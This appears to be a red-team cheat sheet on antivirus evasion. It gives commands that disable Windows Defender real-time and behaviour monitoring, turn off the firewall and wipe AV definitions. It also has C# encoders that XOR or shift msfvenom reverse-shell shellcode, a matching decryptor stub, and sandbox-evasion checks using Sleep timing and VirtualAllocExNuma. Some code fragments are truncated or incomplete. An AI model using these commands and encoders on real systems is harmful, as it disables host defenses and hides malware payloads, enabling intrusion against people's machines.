Evasions
rmb to use x64 shellcodes and build with x64
Disable AV (admin)
May need GUI (RDP 3389) with admin access to turn off other AV (e.g. AVG)
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /fSet-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose
netsh Advfirewall set allprofiles state offcmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -allWe may add a new user for easier system access.
Shellcode Encryption
Encryptor
helper.exe
using System;
using System.Text;
namespace Helper
{
internal class Program
{
static void Main(string[] args)
{
0xfc,0x48,0x83,0xe4,0xf0};
byte[] encoded = new byte[buf.Length];
for (int i = 0; i < buf.Length; i++)
{
encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
}
StringBuilder hex = new StringBuilder(encoded.Length * 2);
foreach (byte b in encoded)
{
hex.AppendFormat("0x{0:x2}, ", b);
}
Console.WriteLine("The payload is: " + hex.ToString());
}
}
}alt
using System;
using System.Text;
namespace xorer
{
public class Program
{
public static void Main(string[] args)
{
//msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f csharp
byte[] buf = new byte[324] {0xfc,0xe8,0x82,0x00,0x00,0x00,
0x6f,0x6a,0x00,0x53,0xff,0xd5};
int key = 169;
// Encode the payload with XOR
byte[] encoded = new byte[buf.Length];
for (int i = 0; i < buf.Length; i++)
{
encoded[i] = (byte)((uint)buf[i] ^ key);
}
StringBuilder hex;
if (args.Length > 0)
{
switch (args[0])
{
case "-VBA":
// Printout VBA payload
uint counter = 0;
hex = new StringBuilder(encoded.Length * 2);
foreach (byte b in encoded)
{
hex.AppendFormat("{0:D}, ", b);
counter++;
if (counter % 50 == 0)
{
hex.AppendFormat("_{0}", Environment.NewLine);
}
}
Console.WriteLine($"XORed VBA payload (key: {key}):");
Console.WriteLine(hex.ToString());
break;
default:
Console.WriteLine("Accepted arguments: -VBA to print VBA payload instead of C#");
break;
}
}
else
{
// Printout C# payload
hex = new StringBuilder(encoded.Length * 2);
int totalCount = encoded.Length;
for (int count = 0; count < totalCount; count++)
{
byte b = encoded[count];
if ((count + 1) == totalCount) // Dont append comma for last item
{
hex.AppendFormat("0x{0:x2}", b);
}
else
{
hex.AppendFormat("0x{0:x2}, ", b);
}
if ((count + 1) % 15 == 0)
{
hex.Append("\n");
}
}
Console.WriteLine($"XORed C# payload (key: {key}):");
Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};");
}
// Decode the XOR payload
/*
for (int i = 0; i < buf.Length; i++)
{
buf[i] = (byte)((uint)buf[i] ^ {key}); // replace {key} with key value
}
*/
// VBA
/*
For i = 0 To UBound(buf)
buf(i) = buf(i) XOR {key} // replace {key} with key value
Next i
*/
}
}
}Decryptor
insert in shellcode
for(int i = 0; i < buf.Length; i++)
{
buf[i] = (byte)(((uint)buf[i] - 2) & 0xFF);
}Bypass heuristics scan
Sleep
insert before shellcode runs
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
static void Main(string[] args)
{
DateTime t1 = DateTime.Now;
Sleep(2000);
double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
if(t2 < 1.5)
{
return;
}Non-emulated APIs
insert before shellcode runs
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if(mem == null)
{
return;
}Last updated